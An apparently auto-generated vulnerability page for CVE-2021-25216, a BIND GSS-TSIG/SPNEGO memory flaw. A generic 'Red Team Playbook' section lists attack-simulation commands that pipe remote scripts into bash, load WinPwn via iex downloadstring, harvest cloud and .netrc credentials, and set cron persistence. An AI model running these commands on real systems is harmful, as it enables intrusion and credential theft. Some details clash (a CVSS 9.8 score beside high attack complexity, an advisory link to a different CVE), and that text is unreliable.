CVE-2021-25216
Overview
This vulnerability is a memory corruption flaw involving buffer over-read and buffer overflow conditions within the ISC SPNEGO implementation used by BIND's GSS-TSIG feature. The root cause lies in improper handling of SPNEGO authentication tokens when configured with tkey-gssapi-keytab or tkey-gssapi-credential options. The affected component is the ISC SPNEGO code path in BIND versions 9.5.0 through 9.17.1 development branch and specific supported preview editions.
Vulnerability Description
In BIND 9.5.0 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.11.3-S1 -> 9.11.29-S1 and 9.16.8-S1 -> 9.16.13-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.1 of the BIND 9.17 development branch, BIND servers are vulnerable if they are running an affected version and are configured to use GSS-TSIG features. In a configuration which uses BIND's default settings the vulnerable code path is not exposed, but a server can be rendered vulnerable by explicitly setting values for the tkey-gssapi-keytab or tkey-gssapi-credential configuration options. Although the default configuration is not vulnerable, GSS-TSIG is frequently used in networks where BIND is integrated with Samba, as well as in mixed-server environments that combine BIND servers with Active Directory domain controllers. For servers that meet these conditions, the ISC SPNEGO implementation is vulnerable to various attacks, depending on the CPU architecture for which BIND was built: For named binaries compiled for 64-bit platforms, this flaw can be used to trigger a buffer over-read, leading to a server crash. For named binaries compiled for 32-bit platforms, this flaw can be used to trigger a server crash due to a buffer overflow and possibly also to achieve remote code execution. We have determined that standard SPNEGO implementations are available in the MIT and Heimdal Kerberos libraries, which support a broad range of operating systems, rendering the ISC implementation unnecessary and obsolete. Therefore, to reduce the attack surface for BIND users, we will be removing the ISC SPNEGO implementation in the April releases of BIND 9.11 and 9.16 (it had already been dropped from BIND 9.17). We would not normally remove something from a stable ESV (Extended Support Version) of BIND, but since system libraries can replace the ISC SPNEGO implementation, we have made an exception in this case for reasons of stability and security.
Impact
An unauthenticated remote attacker with network access to a vulnerable BIND server configured for GSS-TSIG can cause denial of service via server crashes on both 32-bit and 64-bit platforms. On 32-bit platforms, the attacker may also achieve remote code execution, compromising server integrity. This enables potential lateral movement or disruption in environments integrating BIND with Samba or Active Directory. The vulnerability requires no user interaction and has high attack complexity (CVSS vector AV:N/AC:H/PR:N/UI:N).
Solution
Users should upgrade affected ISC BIND9 versions to releases where the ISC SPNEGO implementation has been removed or replaced, specifically the April releases of BIND 9.11 and 9.16, or later stable versions. Debian security advisory DSA-4909 provides patched packages for Debian Linux 9 and 10. Refer to https://www.debian.org/security/2021/dsa-4909 and ISC's advisory at https://kb.isc.org/v1/docs/cve-2021-25215 for detailed patching instructions and version-specific guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in BIND, specifically affecting versions from 9.5.0 to 9.17.1, arises from improper handling of GSS-TSIG features when certain configuration options are explicitly set. While the default settings of BIND do not expose this flaw, administrators who modify the tkey-gssapi-keytab or tkey-gssapi-credential options inadvertently open their systems to significant risks. The flaw manifests differently depending on the architecture of the compiled binaries: 64-bit versions may experience a buffer over-read leading to a server crash, while 32-bit versions are susceptible to buffer overflow, which can escalate to remote code execution. This discrepancy highlights the criticality of understanding the underlying architecture and configuration of the BIND installation in question.
Exploitation of this vulnerability can occur in environments where BIND is integrated with Samba or Active Directory domain controllers, particularly in mixed-server settings. An attacker could leverage the flawed GSS-TSIG implementation to execute arbitrary code or cause a denial of service by crashing the server. The potential for remote code execution is particularly alarming, as it allows an attacker to gain control over the affected server, leading to further exploitation of the network. Attackers could use this access to exfiltrate sensitive data, deploy malware, or pivot to other systems within the network, amplifying the impact of the initial breach.
The real-world implications of this vulnerability are profound, especially for organizations relying on BIND for DNS services. A successful attack could lead to significant operational disruptions, data breaches, and financial losses. The potential for remote code execution poses a severe threat, as it can compromise the integrity of the entire network. Organizations may face reputational damage, regulatory penalties, and the costs associated with incident response and recovery efforts. The high CVSS score of 9.8 reflects the critical nature of this vulnerability and underscores the urgency for organizations to address it.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of their BIND installations, ensuring they are aware of the versions in use and their configurations. Regular vulnerability scanning and penetration testing can help identify systems at risk. It is crucial to review and, if necessary, revert any non-default configurations that enable GSS-TSIG features unless absolutely required. The removal of the ISC SPNEGO implementation in future releases of BIND serves as a proactive measure to reduce the attack surface. Organizations should prioritize upgrading to the latest versions of BIND, as this not only addresses the vulnerability but also ensures they benefit from ongoing security enhancements.
In conclusion, the vulnerability in BIND related to GSS-TSIG features presents a significant risk to organizations that utilize this DNS software, particularly in environments with specific configurations. Understanding the technical details, potential attack vectors, and real-world impacts is essential for effective risk management. By implementing robust detection and mitigation strategies, organizations can safeguard their systems against exploitation and enhance their overall security posture.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-25216, rising by over 200% to a current value exceeding 0.83. This surge reflects growing confidence in the likelihood of exploitation attempts targeting vulnerable BIND servers configured with GSS-TSIG features. Although no new exploit techniques or proof-of-concept code have been observed in the wild, the upward trend in EPSS suggests that threat actors are increasingly prioritizing this vulnerability for potential attack campaigns. For defenders, this escalation signals a heightened risk environment where the window for exploitation is expanding, particularly in networks that have not mitigated or patched affected BIND versions. Consequently, the threat level associated with CVE-2021-25216 should be considered elevated, warranting increased vigilance in monitoring DNS infrastructure and related telemetry for anomalous activity indicative of exploitation attempts.
Affected Products (36)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Debian | Debian Linux | 9.0 |
cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*
|
|
|
Isc | Bind | All |
cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*
|
|
|
Isc | Bind | 9.9.3 |
cpe:2.3:a:isc:bind:9.9.3:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.9.12 |
cpe:2.3:a:isc:bind:9.9.12:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.9.13 |
cpe:2.3:a:isc:bind:9.9.13:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.10.5 |
cpe:2.3:a:isc:bind:9.10.5:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.10.7 |
cpe:2.3:a:isc:bind:9.10.7:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.3 |
cpe:2.3:a:isc:bind:9.11.3:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s3:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s5:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.5 |
cpe:2.3:a:isc:bind:9.11.5:s6:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.6 |
cpe:2.3:a:isc:bind:9.11.6:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.7 |
cpe:2.3:a:isc:bind:9.11.7:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.8 |
cpe:2.3:a:isc:bind:9.11.8:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.12 |
cpe:2.3:a:isc:bind:9.11.12:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.21 |
cpe:2.3:a:isc:bind:9.11.21:s1:*:*:supported_preview:*:*:*
|
|
|
Isc | Bind | 9.11.27 |
cpe:2.3:a:isc:bind:9.11.27:s1:*:*:supported_preview:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-540 | Overread Buffers |
36%
|
Low | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.